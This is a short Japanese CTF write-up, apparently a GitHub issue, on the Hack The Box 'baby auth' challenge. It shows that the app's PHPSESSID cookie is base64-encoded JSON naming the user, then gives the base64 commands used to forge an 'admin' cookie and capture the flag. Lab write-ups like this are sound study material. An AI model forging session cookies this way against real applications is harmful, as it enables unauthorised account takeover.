Open roaris opened 6 months ago
ユーザ登録とログイン機能を持ったアプリケーション ログイン機能でSQLインジェクションは出来ない模様
ユーザ登録して、ログインすると"You are not an admin"と出てくる adminという名前でユーザ登録しようとすると、"this user already exists"と出てくる
PHPSESSIDという名前でCookieが発行されている
eyJ1c2VybmFtZSI6ImEifQ%3D%3D
という値だった
3Dは=のASCIIコードである
base64デコードする
$ echo -n "eyJ1c2VybmFtZSI6ImEifQ==" | base64 -d
{"username":"a"}
"a"の部分を"admin"に変えて、base64エンコード
$ echo -n "{\"username\":\"admin\"}" | base64
eyJ1c2VybmFtZSI6ImFkbWluIn0=
この値をPHPSESSIDに設定して、ページを読み込むとフラグが取れる(最後の=は%3Dにしなくてもいけた)
https://app.hackthebox.com/challenges/baby%20auth